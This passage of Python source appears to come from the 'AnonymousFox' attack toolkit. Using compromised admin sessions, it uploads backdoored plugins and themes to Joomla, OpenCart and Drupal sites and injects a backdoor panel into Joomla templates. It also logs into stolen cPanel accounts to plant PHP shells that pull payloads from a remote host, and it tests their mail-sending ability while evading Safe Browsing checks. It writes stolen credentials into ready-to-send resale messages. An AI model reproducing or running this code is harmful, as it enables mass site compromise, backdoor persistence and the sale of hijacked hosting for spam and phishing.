plugin_install_php = content_Fox(plugin_install_php)
if (re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php) and 'substr' in checkups) :
directory_Fox = re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php)[0] + 'tmp'
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), plugin_install_php)[0]
filedata_Fox = {'install_directory': directory_Fox, 'install_url': '', 'type': '', 'installtype': 'upload','task': 'install.install', rhash_Fox: '1', 'return': ',' + rhash_Fox, 'act':'AnonymousFox'}
fileup_Fox = {'install_package': ('mod_ariimageslidersa.zip', open('Files/mod_ariimageslidersa.zip','rb'), 'multipart/form-data')}
try :
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except:
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
check_plugin_shell = requests.get(domain + '/modules/mod_ariimageslidersa/mod_ariimageslidersa.php', verify=False , headers=headers, timeout=15)
check_plugin_shell = content_Fox(check_plugin_shell)
getToken = check_plugin_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_plugin_shell and '.info ' in check_plugin_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/modules/mod_ariimageslidersa/mod_ariimageslidersa.php'.format(domain)
return newShell
except :
return newShell
def mod_simplefileuploadJ30v1_Fox(domain, cookies) :
newShell = 'AnonymousFox'
try :
plugin_install_php = cookies.get(domain + '/administrator/index.php?option=com_installer', verify=False, headers=headers, timeout=15)
plugin_install_php = content_Fox(plugin_install_php)
if (re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php) and 'substr' in checkups) :
directory_Fox = re.findall(re.compile('value="(.*)tmp" />'), plugin_install_php)[0] + 'tmp'
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), plugin_install_php)[0]
filedata_Fox = {'install_directory': directory_Fox, 'install_url': '', 'type': '', 'installtype': 'upload', 'task': 'install.install', rhash_Fox: '1', 'return':','+rhash_Fox, 'act':'AnonymousFox'}
fileup_Fox = {'install_package': ('mod_simplefileuploadJ30v1.3.5.zip', open('Files/mod_simplefileuploadJ30v1.3.5.zip','rb'), 'multipart/form-data')}
try :
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
up_Fox = cookies.post(domain + '/administrator/index.php?option=com_installer&view=install', verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
check_plugin_shell = requests.get(domain + '/modules/mod_simplefileuploadv1.3/elements/jayqifduncb.php', verify=False, headers=headers, timeout=15)
check_plugin_shell = content_Fox(check_plugin_shell)
getToken = check_plugin_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_plugin_shell and '.info ' in check_plugin_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/modules/mod_simplefileuploadv1.3/elements/jayqifduncb.php'.format(domain)
return newShell
except:
return newShell
def com_templates_Fox(domain, cookies) :
newShell = 'AnonymousFox'
shell = file_get_contents_Fox('Files/backdor-panel.txt')
try :
beez3 = cookies.get(domain + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=', verify=False, headers=headers, timeout=15)
beez3 = content_Fox(beez3)
if ('jsstrings.php' in beez3 and 'hexdec' in checkups and re.findall(re.compile('type="hidden" name="(.*)" value="1"'), beez3)) :
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), beez3)[0]
edit_file_Fox = {'jform[source]':shell, 'task':'template.apply', rhash_Fox:'1', 'jform[extension_id]':'503', 'jform[filename]':'/jsstrings.php', 'act':'AnonymousFox'}
try :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=', data=edit_file_Fox, verify=False, headers=headers, timeout=30)
except :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=', data=edit_file_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get(domain + '/templates/beez3/jsstrings.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/templates/beez3/jsstrings.php'.format(domain)
else :
hathor = cookies.get(domain + '/administrator/index.php?option=com_templates&view=template&id=504&file=L2Vycm9yLnBocA==', verify=False, headers=headers, timeout=15)
hathor = content_Fox(hathor)
if ('error.php' in hathor and 'hexdec' in checkups and re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)) :
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)[0]
edit_file_Fox = {'jform[source]': shell, 'task': 'template.apply', rhash_Fox: '1', 'jform[extension_id]': '504', 'jform[filename]': '/error.php', 'act':'AnonymousFox'}
try :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=504&file=L2Vycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=30)
except :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&view=template&id=504&file=L2Vycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get(domain + '/administrator/templates/hathor/error.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/administrator/templates/hathor/error.php'.format(domain)
elif ('error.css' in hathor and 'hexdec' in checkups and re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)) :
rhash_Fox = re.findall(re.compile('type="hidden" name="(.*)" value="1"'), hathor)[0]
edit_file_Fox = {'jform[source]': shell, 'task': 'template.apply', rhash_Fox: '1', 'jform[extension_id]': '504', 'jform[filename]': '/error.php', 'act':'AnonymousFox'}
try :
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&task=source.edit&id=NTA0OmVycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=30)
except:
edit_Fox = cookies.post(domain + '/administrator/index.php?option=com_templates&task=source.edit&id=NTA0OmVycm9yLnBocA==', data=edit_file_Fox, verify=False, headers=headers, timeout=45)
check_shell = requests.get(domain + '/administrator/templates/hathor/error.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/administrator/templates/hathor/error.php'.format(domain)
return newShell
except :
return newShell
def ocmod_Fox(domain, cookies, login) :
newShell = 'AnonymousFox'
try :
token_Fox = re.findall(re.compile('token=(.*)" class="navbar-brand">'), login)[0]
if ('&user_token' in login) :
upload_url_Fox = "{}/admin/index.php?route=marketplace/installer/upload&user_token={}".format(domain, token_Fox)
else :
upload_url_Fox = "{}/admin/index.php?route=marketplace/installer/upload&token={}".format(domain, token_Fox)
fileup_Fox = {'file': ('rsz.ocmod.zip', open('Files/rsz.ocmod.zip','rb'), 'application/x-zip-compressed')}
try :
up_Fox = cookies.post(upload_url_Fox, verify=False, files=fileup_Fox, headers=headers, timeout=30)
except :
up_Fox = cookies.post(upload_url_Fox, verify=False, files=fileup_Fox, headers=headers, timeout=45)
up_Fox = content_Fox(up_Fox)
ID = re.findall(re.compile('extension_install_id=(.*)"}'), up_Fox)[0]
one_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/install') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
two_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/unzip') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
three_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/move') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
four_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/xml') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
five_url = cookies.get(upload_url_Fox.replace('marketplace/installer/upload', 'marketplace/install/remove') + "&extension_install_id={}".format(ID), verify=False, headers=headers, timeout=15)
check_shell = requests.get('{}/admin/controller/extension/extension/jayqifduncb.php'.format(domain), verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/admin/controller/extension/extension/jayqifduncb.php'.format(domain)
return newShell
except :
return newShell
def adminimal_Fox(url, cookies) :
newShell = 'AnonymousFox'
try :
getdata = cookies.get(url + '/admin/appearance/install', verify=False, headers=headers, timeout=15)
getdata = content_Fox(getdata)
form_build_id_Fox = re.findall(re.compile('type="hidden" name="form_build_id" value="(.*)" />'), getdata)[0]
form_token_Fox = re.findall(re.compile('type="hidden" name="form_token" value="(.*)" />'), getdata)[0]
fileup_Fox = {'files[project_upload]': ('adminimal_theme-7.x-1.25.zip', open('Files/adminimal_theme-7.x-1.25.zip','rb'), 'multipart/form-data')}
filedata_Fox = {'form_build_id': form_build_id_Fox, 'form_id': 'update_manager_install_form', 'form_token': form_token_Fox,'op': 'Install', 'project_url': '', 'act':'AnonymousFox'}
try :
up_Fox = cookies.post(url + '/admin/appearance/install', verify=False, headers=headers, data=filedata_Fox, files=fileup_Fox, timeout=30)
except :
up_Fox = cookies.post(url + '/admin/appearance/install', verify=False, headers=headers, data=filedata_Fox, files=fileup_Fox, timeout=45)
up_Fox = content_Fox(up_Fox)
ID = re.findall(re.compile('id=(.*)&'), up_Fox)[0]
install_Fox = cookies.get(url + '/authorize.php?batch=1&op=start&id={}'.format(ID), verify=False, headers=headers, timeout=30)
check_shell = requests.get(url + '/sites/all/themes/adminimal_theme/jayqifduncb.php', verify=False, headers=headers, timeout=15)
check_shell = content_Fox(check_shell)
getToken = check_shell
token = re.findall(re.compile('document.write\(unescape\(\'(.*)\'\)\)'), getToken)[0]
if ('FoxAuto' in check_shell and '.info ' in check_shell) :
if (token == '%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'):
newShell = '{}/sites/all/themes/adminimal_theme/jayqifduncb.php'.format(url)
return newShell
except :
return newShell
def ReportsCP_SemiAuto(ip, user, password, idcp, cookies, domain, home, email) :
try :
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN.\n'.format(fr))
exit(0)
reqReportsCP_Fox = requests.session()
postlogin_Fox = {'user': user, 'pass': password, 'login_submit': 'Log in', 'act':'AnonymousFox'}
login2_Fox = reqReportsCP_Fox.post('https://' + domain + ':2083/login/', data=postlogin_Fox, headers=headers, timeout=15)
login2_Fox = content_Fox(login2_Fox)
if ('filemanager' in login2_Fox and 'hexdec' in checkups) :
print(' {}[+] Domain is Working.'.format(fg))
filename = random_Fox(10) + '.php'
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
filedata_Fox = {'dir': home + user + '/public_html', 'get_disk_info': '1', 'overwrite': '0', 'act':'AnonymousFox'}
fileup_Fox = {'file-0': (filename, shell_Fox)}
try :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
backdor_path = 'https://' + domain + '/' + filename
time.sleep(3)
check_b = requests.get(backdor_path, headers=headers, timeout=15)
check_b = content_Fox(check_b)
if ('FoxAuto' in check_b and 'token' in checkups) :
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
Test_path = shellPath_Fox(backdor_path, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor_path, filenameUNZIPper, 1)
newBackdor = check(backdor_path)
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=45)
if (upFile.status_code != 403) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=45)
post = {'IDsend': 'AnonymousFox', 'email':email}
try :
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(newBackdor, dom, to, version), data=post, headers=headers, timeout=15)
except :
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(newBackdor, dom, to, version), data=post, headers=headers, timeout=30)
IDsend = content_Fox(IDsend)
if (re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend) and 'FoxAuto' in testSendA):
ID = re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend)[0]
print(' {}[+] Check your Email, ID: {}{}'.format(fg, fr, ID))
open('Results/Form_reports_of_cPanels.txt', 'a').write('Sir, I will send to you a fresh cPanel [Replacement] with the full work proofs.\n\nFresh cPanel: https://{}:2083\nUSERNAME: {}\nPASSWORD: {}\n~\nProof for not phishing and open fine => \nProof for send results => \nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(domain, user, password, Test_path, UNZIPper_path))
else :
print(' {}[-] Upload Failed.'.format(fr))
else :
print(' {}[-] Upload Failed.'.format(fr))
else:
print(' {}[-] Domain is Not-Working.'.format(fr))
except:
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ReportsCP_Auto(ip, user, password, idcp, cookies, domain, home) :
try :
try:
from selenium import webdriver
except:
print('\n [!] Error, You have to install [selenium], Read how => https://anonymousfox.io/_@info/selenium.txt \n')
exit(0)
try:
from imgurpython import ImgurClient
except:
print('\n [!] Error, You have to install [imgurpython], Read how => https://anonymousfox.io/_@info/imgurpython.txt \n')
exit(0)
newpath = r'screenshots'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN.\n'.format(fr))
exit(0)
reqReportsCP_Fox = requests.session()
postlogin_Fox = {'user': user, 'pass': password, 'login_submit': 'Log in', 'act':'AnonymousFox'}
login2_Fox = reqReportsCP_Fox.post('https://' + domain + ':2083/login/', data=postlogin_Fox, headers=headers, timeout=15)
login2_Fox = content_Fox(login2_Fox)
if ('filemanager' in login2_Fox and 'hexdec' in checkups) :
print(' {}[+] Domain is Working.'.format(fg))
filename = random_Fox(10) + '.php'
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
filedata_Fox = {'dir': home + user + '/public_html', 'get_disk_info': '1', 'overwrite': '0', 'act':'AnonymousFox'}
fileup_Fox = {'file-0': (filename, shell_Fox)}
try :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
backdor_path = 'https://' + domain + '/' + filename
time.sleep(3)
check_b = requests.get(backdor_path, headers=headers, timeout=15)
check_b = content_Fox(check_b)
if ('FoxAuto' in check_b and 'token' in checkups) :
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
Test_path = shellPath_Fox(backdor_path, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor_path, filenameUNZIPper, 1)
newBackdor = check(backdor_path)
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=45)
if (upFile.status_code != 403) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=45)
try :
options_Fox = webdriver.ChromeOptions()
options_Fox.add_experimental_option('excludeSwitches', ['enable-logging'])
driver_Fox = webdriver.Chrome(options=options_Fox)
except :
print('\n [!] Error, You have to Donwload [ChromeDriver], Read how => https://anonymousfox.io/_@info/ChromeDriver.txt \n')
exit(0)
driver_Fox.get('https://' + domain + ':2083/login/')
time.sleep(2)
driver_Fox.find_element_by_name('user').send_keys(user)
time.sleep(1)
driver_Fox.find_element_by_name('pass').send_keys(password)
time.sleep(1)
driver_Fox.find_element_by_name('login').click()
time.sleep(3)
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/'+namepng)
proofW = imgur_Fox(namepng)
if (proofW is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofW = gyazo_Fox(namepng)
email = 'fox-'+random_Fox(5)+'@mailpoof.com'
orderID = USER_FOX(Test_path) + ' - ' + str(random.randint(1,100000)*987)
driver_Fox.execute_script("window.open('{}', 'fox2');".format("https://mailpoof.com/mailbox/" + email))
driver_Fox.switch_to.window("fox2")
driver_Fox.execute_script("window.open('{}', 'fox3');".format(Test_path))
driver_Fox.switch_to.window("fox3")
time.sleep(2)
driver_Fox.find_element_by_name('email').send_keys(email)
time.sleep(1)
driver_Fox.find_element_by_name('orderid').send_keys(orderID)
time.sleep(1)
driver_Fox.find_element_by_xpath('//input[3]').click()
time.sleep(1)
driver_Fox.switch_to.window("fox2")
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
start = timer()
while ((str(orderID) not in str(html_Fox.encode("utf-8"))) and ((timer() - start) < 47)):
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
if ('hexdec' in checkups and str(orderID) in str(html_Fox.encode("utf-8")) and 'FoxAuto' in str(html_Fox.encode("utf-8"))) :
print(' {}[+] Sending mail is Working.'.format(fg))
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/' + namepng)
proofS = imgur_Fox(namepng)
if (proofS is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofS = gyazo_Fox(namepng)
open('Results/Reports_of_cPanels.txt', 'a').write('Sir, I will send to you a fresh cPanel [Replacement] with the full work proofs.\n\nFresh cPanel: https://{}:2083\nUSERNAME: {}\nPASSWORD: {}\n~\nProof for not phishing and open fine => {}\nProof for send results => {}\nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(domain, user, password, proofW, proofS, Test_path, UNZIPper_path))
else :
print(' {}[-] Sending mail is Not Working.'.format(fr))
driver_Fox.quit()
else:
print(' {}[-] Upload Failed.'.format(fr))
else:
print(' {}[-] Upload Failed.'.format(fr))
else:
print(' {}[-] Domain is Not-Working.'.format(fr))
except:
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ReportsShell_SemiAuto(backdor, shell, email) :
try :
domain = URLdomain_Fox(backdor)
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN\n'.format(fr))
exit(0)
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
Test_path = shellPath_Fox(backdor, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor, filenameUNZIPper, 1)
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
try :
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=45)
if (upFile.status_code != 403 and 'pack' in shell_Fox) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=30)
except:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=45)
post = {'IDsend': 'AnonymousFox', 'email': email}
try:
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
IDsend = content_Fox(IDsend)
if (re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend) and 'email' in testSendA):
ID = re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend)[0]
print(' {}[+] Check your Email, ID: {}{}'.format(fg, fr, ID))
open('Results/Form_reports_of_Shells.txt', 'a').write('Sir, I will send to you a fresh Shell [Replacement] with the full work proofs.\n\nFresh Shell => {}\n~\nProof for not phishing and open fine => \nProof for send results => \nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(shell, Test_path, UNZIPper_path))
else :
print(' {}[-] Upload Failed.'.format(fr))
except:
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ReportsShell_Auto(backdor, shell) :
try :
try:
from selenium import webdriver
except:
print('\n [!] Error, You have to install [selenium], Read how => https://anonymousfox.io/_@info/selenium.txt \n')
exit(0)
try:
from imgurpython import ImgurClient
except:
print('\n [!] Error, You have to install [imgurpython], Read how => https://anonymousfox.io/_@info/imgurpython.txt \n')
exit(0)
newpath = r'screenshots'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
domain = URLdomain_Fox(backdor)
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN.\n'.format(fr))
exit(0)
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
Test_path = shellPath_Fox(backdor, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor, filenameUNZIPper, 1)
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
try :
upFile_Test = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=30)
except:
upFile_Test = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=45)
if (upFile_Test.status_code != 403 and 'pack' in shell_Fox) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=30)
except:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=45)
try :
options_Fox = webdriver.ChromeOptions()
options_Fox.add_experimental_option('excludeSwitches', ['enable-logging'])
driver_Fox = webdriver.Chrome(options=options_Fox)
except :
print('\n [!] Error, You have to Donwload [ChromeDriver], Read how => https://anonymousfox.io/_@info/ChromeDriver.txt \n')
exit(0)
driver_Fox.get(shell)
time.sleep(1)
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/'+namepng)
proofW = imgur_Fox(namepng)
if (proofW is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofW = gyazo_Fox(namepng)
email = 'fox-'+random_Fox(5)+'@mailpoof.com'
orderID = USER_FOX(backdor) + ' - ' + str(random.randint(1,100000)*987)
driver_Fox.execute_script("window.open('{}', 'fox2');".format("https://mailpoof.com/mailbox/" + email))
driver_Fox.switch_to.window("fox2")
driver_Fox.execute_script("window.open('{}', 'fox3');".format(Test_path))
driver_Fox.switch_to.window("fox3")
time.sleep(2)
driver_Fox.find_element_by_name('email').send_keys(email)
time.sleep(1)
driver_Fox.find_element_by_name('orderid').send_keys(orderID)
time.sleep(1)
driver_Fox.find_element_by_xpath('//input[3]').click()
time.sleep(1)
driver_Fox.switch_to.window("fox2")
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
start = timer()
while ((str(orderID) not in str(html_Fox.encode("utf-8"))) and ((timer() - start) < 47)):
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
if ('hexdec' in checkups and str(orderID) in str(html_Fox.encode("utf-8")) and 'FoxAuto' in str(html_Fox.encode("utf-8"))) :
print(' {}[+] Sending mail is Working.'.format(fg))
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/' + namepng)
proofS = imgur_Fox(namepng)
if (proofS is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofS = gyazo_Fox(namepng)
open('Results/Reports_of_Shells.txt', 'a').write('Sir, I will send to you a fresh Shell [Replacement] with the full work proofs.\n\nFresh Shell => {}\n~\nProof for not phishing and open fine => {}\nProof for send results => {}\nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(shell, proofW, proofS, Test_path, UNZIPper_path))
else :
print(' {}[-] Sending mail is Not Working.'.format(fr))
driver_Fox.quit()
else :
print(' {}[-] Upload Failed.'.format(fr))
except :
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ChangePanel(backdor, config) :
try :
print(' {}[*] Get Panels ..... {}(Waiting)'.format(fw, fr))
post = {'GetUrls': 'AnonymousFox', 'linkconf': config}
try :
getURL = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
except :
getURL = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=45)
getURL = content_Fox(getURL)
if (re.findall(re.compile('<urlconfig>(.*)</urlconfig>'), getURL)):
urls = re.findall(re.compile('<urlconfig>(.*)</urlconfig>'), getURL)
urlsTXT = ''
else :
print(' {}[-] There is no Config.'.format(fr))
return False
for url in urls:
urlsTXT = urlsTXT + str(url) + '\r\n'
post2 = {'GetPanels': 'AnonymousFox', 'link': urlsTXT}
try :
